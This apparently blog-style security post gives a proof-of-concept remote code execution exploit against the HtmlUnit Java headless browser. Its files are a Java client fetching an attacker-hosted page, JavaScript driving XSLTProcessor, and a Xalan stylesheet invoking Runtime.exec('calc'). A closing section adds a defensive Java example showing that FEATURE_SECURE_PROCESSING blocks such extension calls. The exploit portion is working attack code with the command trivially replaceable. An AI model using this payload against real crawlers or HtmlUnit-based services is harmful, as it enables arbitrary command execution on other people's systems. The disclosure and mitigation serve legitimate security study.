HtmlUnit-RCE

HtmlUnit is a headless browser for Java. Honestly I don't think it really counts as a headless browser; it is more like a crawler. Even the latest version can be made to trigger RCE simply by browsing to an attacker-controlled web page.

For now I am just putting up a screenshot; I will fill in the rest later.


It is honestly so simple that I won't bother analyzing it; I only glanced at it by chance that day and found it. XSLT does seem to be a hot topic lately, though.

Test.java

package HtmlUnit;

import com.gargoylesoftware.htmlunit.WebClient;
import com.gargoylesoftware.htmlunit.html.HtmlPage;

public class Test {

    public static void main(String[] args) throws Exception {

        try (final WebClient webClient = new WebClient()) {
            // now you have a running browser and you can start doing real things
            // like going to a web page (here: the htmlunit.html served by the attacker host)
            final HtmlPage page = webClient.getPage("http://xxx/htmlunit.html");
        }
    }
}

htmlunit.html

<script>
function createXmlDocument() {
    return document.implementation.createDocument('', '', null);
}
// Synchronous XHR; returns the response parsed as an XML document
function loadXMLDocumentFromFile(file) {
    var xhttp = new XMLHttpRequest();
    xhttp.open("GET", file, false);
    xhttp.send();
    return xhttp.responseXML;
}
console.log("1");

var xmlDoc = createXmlDocument();
xmlDoc.async = false;
xmlDoc = loadXMLDocumentFromFile("1.xml");

var xslDoc = createXmlDocument();
xslDoc.async = false;
xslDoc = loadXMLDocumentFromFile("2.xml");

// The stylesheet is evaluated by the Java-side XSLT engine behind HtmlUnit's XSLTProcessor
var processor = new XSLTProcessor();
processor.importStylesheet(xslDoc);
processor.transformToDocument(xmlDoc);
</script>

1.xml

<?xml version="1.0" encoding="UTF-8"?>
<s></s>

2.xml

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
                xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object">
    <xsl:template match="/">
        <xsl:variable name="rtobject" select="rt:getRuntime()"/>
        <xsl:variable name="process" select="rt:exec($rtobject,'calc')"/>
        <xsl:variable name="processString" select="ob:toString($process)"/>
        <xsl:value-of select="$processString"/>
    </xsl:template>
</xsl:stylesheet>
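The stylesheet above works because the Xalan-style `http://xml.apache.org/xalan/java/...` namespaces bind XPath functions to arbitrary Java classes. As an added defensive example (not from the original post and not HtmlUnit's own code), the following Java program shows that enabling `XMLConstants.FEATURE_SECURE_PROCESSING` on the `TransformerFactory` makes the processor refuse any such extension call. It uses a constructed stylesheet that reaches the harmless `java.lang.Math.abs` through the same namespace mechanism, so the effect is observable without running a command; the class name `SecureXsltCheck` is hypothetical.

```java
import java.io.StringReader;
import java.io.StringWriter;
import javax.xml.XMLConstants;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamResult;
import javax.xml.transform.stream.StreamSource;

public class SecureXsltCheck {

    // Constructed sample input, same shape as the post's 1.xml.
    static final String XML = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><s></s>";

    // Constructed stylesheet: the same Java-extension namespace mechanism as the
    // post's 2.xml, but bound to java.lang.Math so that it is harmless.
    static final String XSL =
        "<xsl:stylesheet version=\"1.0\""
      + " xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\""
      + " xmlns:m=\"http://xml.apache.org/xalan/java/java.lang.Math\">"
      + "<xsl:template match=\"/\"><xsl:value-of select=\"m:abs(-42)\"/></xsl:template>"
      + "</xsl:stylesheet>";

    /** Applies XSL to XML; returns the output, or null if the processor refused the stylesheet. */
    static String transform(boolean secure) throws TransformerException {
        TransformerFactory tf = TransformerFactory.newInstance();
        if (secure) {
            // Disables Java extension functions in both the JDK's built-in XSLTC and
            // Apache Xalan-J; a stylesheet from an untrusted source must never run without it.
            tf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        }
        try {
            Transformer t = tf.newTransformer(new StreamSource(new StringReader(XSL)));
            StringWriter out = new StringWriter();
            t.transform(new StreamSource(new StringReader(XML)), new StreamResult(out));
            return out.toString();
        } catch (TransformerException e) {
            // Secure mode rejects the extension call (at compile time in XSLTC,
            // at transform time in Xalan-J); report the refusal instead of propagating.
            return null;
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println("extension functions enabled : " + transform(false)); // output contains 42
        System.out.println("FEATURE_SECURE_PROCESSING   : " + transform(true));  // null: refused
    }
}
```

The same feature is what a consumer of untrusted HTML should expect the embedded XSLT engine to set; if the engine you run has no such switch, treat every `xsl:stylesheet` it processes as executable code.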